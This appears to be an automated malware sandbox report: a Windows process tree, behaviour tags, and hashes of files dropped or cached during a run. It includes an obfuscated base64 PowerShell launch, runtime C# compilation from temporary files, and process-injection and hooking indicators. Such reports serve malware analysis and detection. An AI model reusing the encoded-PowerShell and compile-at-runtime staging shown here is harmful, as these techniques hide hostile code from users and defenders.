PID:568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a44bx9d3.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF8C.tmp"7⤵PID:1080
-
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s75uphsa.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC10E3.tmp"7⤵PID:1248
-
-
-
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1868 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1580
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1868 CREDAT:799749 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:960
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD554e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5ae8b8246c65544f8b8f79a3f07992194
SHA183411e3c7757d4656938505b95ca095f4c912e73
SHA2562a8f2b0438169a32487c491166bad3ac20d6e811103e198faa8dc86aedc548f8
SHA51278b14de7410df616b66fab79c0febca21bc3fdb3ecad33e48cd3acb23eb15b43704070d8184a93d21c9c516e2e3fdf7855c641007536978a189a86819fadee2d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD55791465dcc8ba4e561e966e3c1b4baff
SHA1a8dd0aa067f92aa4027a5de60faad344109842f4
SHA2562b87c31deff893df5e02da4860373958e5d7d965ebb9be003dea2e03eb9f15ce
SHA5128cf0bddba0f6d9992bf2b9aa9486ee7c277cc1725e12f5c7a79a81ffb13e8f970bc723f77b69e92d7bfda5bf3d389f19a273f20eca9413cdd44a06b4a104bc61
-
Filesize
4KB
MD5977a22ee8fb6d4c9c9845aa3c6cedda6
SHA1902e6ccbe783c3bf6d8542576b2bfb2867b9e436
SHA25678ed54873b45a2280fa5c13d0f25c3d0b35758accdab78a42f664cffcf4fccbd
SHA512d01993878379c714f7f3dc94ce65c8e002c59d886a87baa4a61d93c143a1bb6fdd914fda5808490009acc9e9a66da467ba75af36d159024f2ef9cfd37c18fa3f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZR09IT6C\favicon[1].ico
Filesize318B
MD5a976d227e5d1dcf62f5f7e623211dd1b
SHA1a2a9dc1abdd3d888484678663928cb024c359ee6
SHA25666332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA5126754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f
-
Filesize
1KB
MD55ea9e158127630f156391104592f6c08
SHA1469a5fab603463dab8afa395e3bff56a3653d54e
SHA256cb301afe2a8202decbb1d1fee5eb9bb89ab6412273b793be177d4b84efa4ce3b
SHA5122a684c9630fd73c0a0cf365c5fccef43c5be1307a7622d26ac991d292415f670e3043158064e276bc3ef5d1193564b042f859e2f8ca38335563065cec98d84e4
-
Filesize
1KB
MD5e6f5c40afd932562e7d632639fff3180
SHA15244f2890504f4e127391cced43b11ec9e3b7857
SHA25690d14c841062bb3cc9bd16861af002bc984a3d31562f1af441b602872a2fc4d4
SHA5122ec47ca88650ea4de89164dcda7156ca1b7144ec5abaed2290035d73e20d0c168181022940a219cd998ba695af3e804662b4e82589e2625d456a0fed589735ef
-
Filesize
3KB
MD53a94e868593c1e3d0f884d841acacadb
SHA139fab8226ca049c9d40663f6d32fd9b926ae5d31
SHA2561655742e661999601fe589fecd6565c2a8197dc2a28e64572b636c824062cbb0
SHA512b231b30be712df25fbf30b3370951b196d706e93fac12b75b5df857def0ebf5d44628198ac88932c489f419951593c03c49ec395257dc5d26584fafbd1631e28
-
Filesize
7KB
MD51c942de7fb257dbc5c17afd78e6422c7
SHA152a8312f71d78a2149a74d25bab51088cdcb07a1
SHA2564d95e7a382f3a530d0ba3f5808e2b5540e22205b97c6619837f7518faea2f241
SHA512659953d0d6c43e8d7cb36ac7cb3b793d018f64712a120e3f291f52706c5fb3ee7e1097395aeffade64cfc0d3b9d1b93552b8b492c174db8912925edb86dc3f7b
-
Filesize
3KB
MD55fe31466bc2252c2b2d499757bea6819
SHA1b74c666c89ac4a58370620749b1d33464f7700d3
SHA2563ea3c98bf5354212e7a8bfaf4b11d74a0e9f9b65283cb3b08ec921c37252a20c
SHA512ca1b4a40fda614ccad984609c2eeb36266cdf12ade1a96ba20a72c29aaa875401b49594329f08f0b5f71e3a468a3ff904b2527e012d7ee56f850d79c6a13deaf
-
Filesize
7KB
MD594b39192ebec0a4ba9fd206f3b02e1da
SHA1832e20d346407dd09edb97e51cd8c18a61e1f7d3
SHA2561a4121269fa5f3a52ad9d7b8f50abf7232ea79adfc98d96acfe008af13b8e6ca
SHA5129cf75708bd379ce5ffc45eec21d8e4617541fff7789f87747d16746974dea1fd4562701aee69db165752f17b2a62a66830ec8a74a1757c0d5f003958b7d7277e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51d3b4f7376f95d37637bee32dd5f9066
SHA1019fc3f43574836f0f446c52838b35856928ed8e
SHA25623af1a9a541b0667742b676a842f70110955551ba67a1d07e21907c53b871b81
SHA5120cbc1ace595f0266a48b6d7a2afea74690adcb00e3b449e9e9b7c1ea754e6a0e9077909ef4e7585e8688184429ab5d521c14da7a6ce35814f7858e5663b78b71
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51d3b4f7376f95d37637bee32dd5f9066
SHA1019fc3f43574836f0f446c52838b35856928ed8e
SHA25623af1a9a541b0667742b676a842f70110955551ba67a1d07e21907c53b871b81
SHA5120cbc1ace595f0266a48b6d7a2afea74690adcb00e3b449e9e9b7c1ea754e6a0e9077909ef4e7585e8688184429ab5d521c14da7a6ce35814f7858e5663b78b71
-
Filesize
652B
MD50dbbe84a55537f88e1584cdd72b2d1e1
SHA1a86c35e4529dd413afb8f598cdbbc04a0a6c40db
SHA256e6c88eda71b9c3a9a1203689df47afb6c42f6c2d94841d3dc63514b445b7d427
SHA5126b480b220c06040aa2423998f6851ac039774e73c8848479274bdbb49d4edf357cea597b9448b3cdc4f071ae524e7af6cdf3c74134119bbcc6e0334823506cb1
-
Filesize
652B
MD5ad143c38f1472b7aa9ed2ec0e4480132
SHA1cf5e07f4054707d7dd31b4c3803897e7a3ae823c
SHA2567b615dc2e4ff71e57ec935ad87e45c3faf37ffefcd38915ff7bc004d3b73a222
SHA51203a1685c265836426060ef7ffda0a099f41a39a637178beead47f3fdc0a23c836ace9ecca22cff56b671f8703573ca61d5b91b5ec99fed5f7f782f17293aeed1
-
Filesize
417B
MD5cdc42ce046de74fa8cb97234640cfcc5
SHA18a6aa5bda682fbb11bc974d752408593aec799cc
SHA2567fca4a3b3889149b375ce11cd1614298a244c05e3dd5fa343be56986aaa675c5
SHA512c2663ca8817dc7a375c06cfc4adb529ab61b098663a550feba5dabe8b9c6269a5e878419d5198cb463b9c6b4d5acb504587ffd5721eab568068a7e9d45d55d13
-
Filesize
309B
MD55cd9ef96fb17f20b93c695314e77818e
SHA1b28b68952701212957dc925d37d1baa2ca8ebe4a
SHA2564fa6e0a4e858a0b57b47fdd8ad4e4702876883050ec067ea13516fdc8991a6c4
SHA512d044400cd59359a16aa6e95b466230b4168d85bb445eea7cc2530b06566187a3cd4d911c859440a8b76959bd279a42ab2950f5c52628401ba1b95a4fa53d3446
-
Filesize
416B
MD5e991aa9d35bfffc8f1e0d5dcf4c95ed1
SHA102d81b5b8cfd7b25d4fa0dab40d6ce6db3129501
SHA2562598df56dcfc916eb9ae7b571c67d2feb92740843e36caccf9df705c03145265
SHA512e0205253f43832674a3ea5dbe376e82fe0a59722ca10bed0184ff8fa298111957437db32aefb725b8c525f62aa8c7bc14922fa665ec9ced0d465d91837da126b
-
Filesize
309B
MD5c1fcb10c65fe8c3d5f0eca7d652afa48
SHA168dbc1536f607d92ae77926a535118aed928ab10
SHA256e26269d0a0ab1b8b9934f94016606abad3559272b95f7d8fd89427f3f02a35cb
SHA5125e498d01b245fa5f8410a440c9818b4756e60d2e1e7f61794ee5669c49ea7de52e2c8e936af916b3a880d2faba1a22cd3bc1d3df56da323720f6e1e5e82d39fc